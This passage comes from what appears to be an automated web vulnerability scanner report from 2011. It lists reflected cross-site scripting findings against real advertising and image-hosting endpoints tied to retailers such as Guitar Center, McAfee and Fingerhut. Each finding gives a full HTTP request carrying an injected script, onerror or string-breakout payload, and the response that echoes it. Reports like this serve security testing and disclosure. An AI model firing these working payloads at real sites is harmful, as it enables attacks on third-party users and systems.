Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:12:13 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 80

km_r(document.body,'888-793-49997d727'-alert(1)-'0a43435fc7f','877-883-7738');

3.289. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /m2/guitarcenter/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 18161<script>alert(1)</script>6d519406201 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1317384164098-265536&mboxPage=1317384164098-265536&mboxCount=1&mbox=gc-b-pencil18161<script>alert(1)</script>6d519406201&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 207
Date: Fri, 30 Sep 2011 12:03:42 GMT
Server: Test & Target

mboxFactories.get('default').get('gc-b-pencil18161<script>alert(1)</script>6d519406201',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317384164098-265536.19");

3.290. http://mcafee12.tt.omtrdc.net/m2/mcafee12/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mcafee12.tt.omtrdc.net
Path:   /m2/mcafee12/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9421b<script>alert(1)</script>90afb1bdcc7 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/mcafee12/mbox/standard?mboxHost=shop.mcafee.com&mboxSession=1317384062138-394024&mboxPage=1317384062138-394024&screenHeight=1200&screenWidth=1920&browserWidth=962&browserHeight=877&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=US_SMB_DIRECT_HOMELP1_MBOX9421b<script>alert(1)</script>90afb1bdcc7&mboxId=0&mboxTime=1317366063301&mboxURL=http%3A%2F%2Fshop.mcafee.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fgcx%3Dw%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsecured%2Bby%2Bmacafee%23sclient%3Dpsy-ab%26hl%3Den%26source%3Dhp%26q%3Dsecured%2Bby%2Bmacafee%2Bstore%26pbx%3D1%26oq%3Dsecured%2Bby%2Bmacafee%2Bstore%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D2661l3411l0l3507l6l5l0l0l0l0l441l1220l3-1.2l3l0%26bav%3Don.2%2Cor.r_gc.r_pw.%2Ccf.osb%26fp%3Df2d1beb1c4e15df7%26biw%3D962%26bih%3D877&mboxVersion=39 HTTP/1.1
Host: mcafee12.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.mcafee.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 222
Date: Fri, 30 Sep 2011 12:01:55 GMT
Server: Test & Target

mboxFactories.get('default').get('US_SMB_DIRECT_HOMELP1_MBOX9421b<script>alert(1)</script>90afb1bdcc7',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317384062138-394024.19");

3.291. http://media.gsimedia.net/ipixel [prodid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /ipixel

Issue detail

The value of the prodid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 183de"><script>alert(1)</script>20f5a84f75e was submitted in the prodid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipixel?spacedesc=1087320_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=ACE&event=Product_Pages&random=1317384281134&siteid=133&pagetype=product&REVENUE=&browserid=152599988183&ORDERID=&prodid=2870764183de"><script>alert(1)</script>20f5a84f75e&catid=0&REFERRER=http%3A//www.acehardware.com/home/index.jsp&carttotal=&pqty= HTTP/1.1
Host: media.gsimedia.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.acehardware.com/product/index.jsp?productId=2870764&clickFrom=Home%3AFeatured+Products
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=20-808336915

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:07:32 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=20-2147483647; expires=Mon, 30 Sep 2013 00:07:32 GMT; path=/; domain=.gsimedia.net
x_transtrans: .6.10.688
Content-Type: text/html
Content-Length: 943
Connection: close

<HTML><BODY>


<!-- Google Code for Product Pages For Test Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1071831421;
var google_conversion_language =
...[SNIP]...
<img src="http://tlcint.teracent.net/tase/int?adv=441&fmt=redir&sec=0&pid=prod&tpid=1312567322759&prodID=2870764183de"><script>alert(1)</script>20f5a84f75e" width="1" height="1" border="0" alt="">
...[SNIP]...

3.292. http://pacificsunwear.tt.omtrdc.net/m2/pacificsunwear/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pacificsunwear.tt.omtrdc.net
Path:   /m2/pacificsunwear/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload e90b1<script>alert(1)</script>3e0bd49c5f1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/pacificsunwear/mbox/standard?mboxHost=shop.pacsun.com&mboxSession=1317384208243-106173&mboxPage=1317384208243-106173&screenHeight=1200&screenWidth=1920&browserWidth=962&browserHeight=877&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=headerGlobalMboxe90b1<script>alert(1)</script>3e0bd49c5f1&mboxId=0&mboxTime=1317366209814&mboxURL=http%3A%2F%2Fshop.pacsun.com%2Fhome.jsp&mboxReferrer=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&mboxVersion=39 HTTP/1.1
Host: pacificsunwear.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 212
Date: Fri, 30 Sep 2011 12:05:50 GMT
Server: Test & Target

mboxFactories.get('default').get('headerGlobalMboxe90b1<script>alert(1)</script>3e0bd49c5f1',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317384208243-106173.19");

3.293. http://s.xp1.ru4.com/meta [ssv_TRT1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The value of the ssv_TRT1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 636aa"%3balert(1)//907ac3db01e was submitted in the ssv_TRT1 parameter. This input was echoed as 636aa";alert(1)//907ac3db01e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /meta?_o=15607&_t=pt-2656-001&ssv_TRT1=Homepage636aa"%3balert(1)//907ac3db01e&ssv_TRT11=Pending HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 30 Sep 2011 12:25:06 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17325466-B17328704=43|0|0|0|0|17327491|17327490|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 847
X-Cnection: close

var xp1_i1 = new Image();
xp1_i1.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Homepage636aa";alert(1)//907ac3db01e||||||||||Pending|||OO-00000000000000000;ord=0981108?";

var xp1_i2 = new Image();
xp1_i2.src = "http://d.xp1.ru4.com/activity?_o=15607&_t=appdecl";

var xp1_i3 = new Image();
xp1_i3.src = "htt
...[SNIP]...

3.294. http://s.xp1.ru4.com/meta [ssv_TRT10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The value of the ssv_TRT10 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e9e3"%3balert(1)//90396dee028 was submitted in the ssv_TRT10 parameter. This input was echoed as 6e9e3";alert(1)//90396dee028 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /meta?_o=15607&_t=pt-2656-001&ssv_TRT1=ProductGroup&ssv_TRT5=45&ssv_TRT6=169560&ssv_TRT9=Belkin%2BLaptop%2BCushtop%2BLap%2BRest&ssv_TRT10=39.996e9e3"%3balert(1)//90396dee028&ssv_TRT11=Pending HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 17325466-B17328704=10|17328710|0|0|0|17327499|17327498|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 30 Sep 2011 12:27:28 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17325466-B17328704=36|17328723|0|0|0|17327556|17327555|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1312
X-Cnection: close

var xp1_i1 = new Image();
xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";

var xp1_i2 = new Image();
xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=118
...[SNIP]...
4817853?";

var xp1_i3 = new Image();
xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560|||Belkin+Laptop+Cushtop+Lap+Rest|39.996e9e3";alert(1)//90396dee028|Pending|||OO-00000000000000000;ord=4817853?";

var xp1_i5 = new Image();
xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&ActionID=39&ActionName=RETARGETING_PILOT_2010
...[SNIP]...

3.295. http://s.xp1.ru4.com/meta [ssv_TRT11 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The value of the ssv_TRT11 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fdf7"%3balert(1)//a543fbaa54e was submitted in the ssv_TRT11 parameter. This input was echoed as 1fdf7";alert(1)//a543fbaa54e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /meta?_o=15607&_t=pt-2656-001&ssv_TRT1=Homepage&ssv_TRT11=Pending1fdf7"%3balert(1)//a543fbaa54e HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 30 Sep 2011 12:25:09 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17325466-B17328704=30|17328720|0|0|0|17327550|17327549|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 852
X-Cnection: close

var xp1_i1 = new Image();
xp1_i1.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Homepage||||||||||Pending1fdf7";alert(1)//a543fbaa54e|||OO-00000000000000000;ord=9274923?";

var xp1_i2 = new Image();
xp1_i2.src = "http://ad.yieldmanager.com/pixel?id=126805&t=2";

var xp1_i4 = new Image();
xp1_i4.src = "http://d.xp1.ru4.com/acti
...[SNIP]...

3.296. http://s.xp1.ru4.com/meta [ssv_TRT5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The value of the ssv_TRT5 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dbae"%3balert(1)//17c7ffa0f8c was submitted in the ssv_TRT5 parameter. This input was echoed as 4dbae";alert(1)//17c7ffa0f8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /meta?_o=15607&_t=pt-2656-001&ssv_TRT1=Category&ssv_TRT5=39654dbae"%3balert(1)//17c7ffa0f8c&ssv_TRT11=Pending HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 17325466-B17328704=30|17328720|0|0|0|17327550|17327549|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 30 Sep 2011 12:26:48 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17325466-B17328704=10|17328710|0|0|0|17327499|17327498|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1440
X-Cnection: close

var xp1_i1 = new Image();
xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128437&t=2";

var xp1_i3 = new Image();
xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|Category||||39654dbae";alert(1)//17c7ffa0f8c||||||Pending|||OO-00000000000000000;ord=7055920?";

var xp1_i4 = new Image();
xp1_i4.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=11881;sz=1x1;ord=7055920?";

var xp1_i5
...[SNIP]...

3.297. http://s.xp1.ru4.com/meta [ssv_TRT6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The value of the ssv_TRT6 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4d5d"%3balert(1)//ea0e712831d was submitted in the ssv_TRT6 parameter. This input was echoed as d4d5d";alert(1)//ea0e712831d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /meta?_o=15607&_t=pt-2656-001&ssv_TRT1=ProductGroup&ssv_TRT5=45&ssv_TRT6=169560d4d5d"%3balert(1)//ea0e712831d&ssv_TRT9=Belkin%2BLaptop%2BCushtop%2BLap%2BRest&ssv_TRT10=39.99&ssv_TRT11=Pending HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 17325466-B17328704=10|17328710|0|0|0|17327499|17327498|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 30 Sep 2011 12:27:23 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17325466-B17328704=36|17328723|0|0|0|17327556|17327555|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1340
X-Cnection: close

var xp1_i1 = new Image();
xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";

var xp1_i2 = new Image();
xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=11882;sz=1x1;ord=4508591?";

var xp1_i3 = new Image();
xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560d4d5d";alert(1)//ea0e712831d|||Belkin+Laptop+Cushtop+Lap+Rest|39.99|Pending|||OO-00000000000000000;ord=4508591?";

var xp1_i5 = new Image();
xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&Action
...[SNIP]...

3.298. http://s.xp1.ru4.com/meta [ssv_TRT9 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The value of the ssv_TRT9 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23389"%3balert(1)//9f55b97ef3e was submitted in the ssv_TRT9 parameter. This input was echoed as 23389";alert(1)//9f55b97ef3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /meta?_o=15607&_t=pt-2656-001&ssv_TRT1=ProductGroup&ssv_TRT5=45&ssv_TRT6=169560&ssv_TRT9=Belkin%2BLaptop%2BCushtop%2BLap%2BRest23389"%3balert(1)//9f55b97ef3e&ssv_TRT10=39.99&ssv_TRT11=Pending HTTP/1.1
Host: s.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 17325466-B17328704=10|17328710|0|0|0|17327499|17327498|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 30 Sep 2011 12:27:26 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 17325466-B17328704=36|17328723|0|0|0|17327556|17327555|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1340
X-Cnection: close

var xp1_i1 = new Image();
xp1_i1.src = "http://ad.yieldmanager.com/pixel?id=128439&t=2";

var xp1_i2 = new Image();
xp1_i2.src = "http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=118
...[SNIP]...
1;ord=4135632?";

var xp1_i3 = new Image();
xp1_i3.src = "http://ad.doubleclick.net/activity;src=2204286;type=unive828;cat=unive678;u=xp_10|ProductGroup||||45|169560|||Belkin+Laptop+Cushtop+Lap+Rest23389";alert(1)//9f55b97ef3e|39.99|Pending|||OO-00000000000000000;ord=4135632?";

var xp1_i5 = new Image();
xp1_i5.src = "http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3121&platform=T&ActionID=39&ActionName=RETARGETING_PILO
...[SNIP]...

3.299. http://s7d5.scene7.com/is/image/bluestembrands//4NT3380000010_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands//4NT3380000010_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d13c<img%20src%3da%20onerror%3dalert(1)>c049202440 was submitted in the REST URL parameter 4. This input was echoed as 7d13c<img src=a onerror=alert(1)>c049202440 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands//4NT3380000010_WVA_9997d13c<img%20src%3da%20onerror%3dalert(1)>c049202440?rgn=0,0,1800,951&scl=5.625&id=TWYb80 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Fri, 30 Sep 2011 12:26:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 30 Sep 2011 12:26:45 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NT3380000010_WVA_9997d13c<img src=a onerror=alert(1)>c049202440

3.300. http://s7d5.scene7.com/is/image/bluestembrands//4NT3380000010_WVA_999 [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands//4NT3380000010_WVA_999

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 58a14<img%20src%3da%20onerror%3dalert(1)>a91f95678f9 was submitted in the id parameter. This input was echoed as 58a14<img src=a onerror=alert(1)>a91f95678f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands//4NT3380000010_WVA_999?req=ctx,json&req=ctx,json&scl=1&id=24335010858a14<img%20src%3da%20onerror%3dalert(1)>a91f95678f9 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/product/Belkin-Laptop-Cushtop-Lap-Rest/NT338.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=13935157.693724999.1314797605.1314808828.1314812571.3; __utmz=13935157.1314812571.3.3.utmcsr=crc.scene7.com|utmccn=(referral)|utmcmd=referral|utmcct=/crc/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 02 Apr 2011 15:30:23 GMT
ETag: "92cfe1dfd2e46cccc32174e8ff66aebb"
Content-Type: text/javascript
Content-Length: 383
Expires: Fri, 30 Sep 2011 12:32:36 GMT
Date: Fri, 30 Sep 2011 12:26:37 GMT
Connection: close

s7jsonResponse(
{"context.id":"bluestembrands%2F4NT3380000010_WVA_999%3Freq%3Dctx%2Cjson%26req%3Dctx%2Cjson%26scl%3D1%26id%3D24335010858a14%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3Ea91f95678f9%26id%3DTWYb80","image.rect":"0,0,1800,951","image.version":"TWYb80","metadata.version":"0g1010","protocol.version":"3.0"},"24335010858a14<img src=a onerror=alert(1)>a91f95678f9");

3.301. http://s7d5.scene7.com/is/image/bluestembrands/2A48A_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/2A48A_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ab7ea<img%20src%3da%20onerror%3dalert(1)>a50c18d4da6 was submitted in the REST URL parameter 4. This input was echoed as ab7ea<img src=a onerror=alert(1)>a50c18d4da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/2A48A_400ab7ea<img%20src%3da%20onerror%3dalert(1)>a50c18d4da6?$Thumbnail$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.fingerhut.com/thumbnail/Holiday-Big-Book/Holiday-Decor-Outdoor/Mcatp/cat_3960/3965.uts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
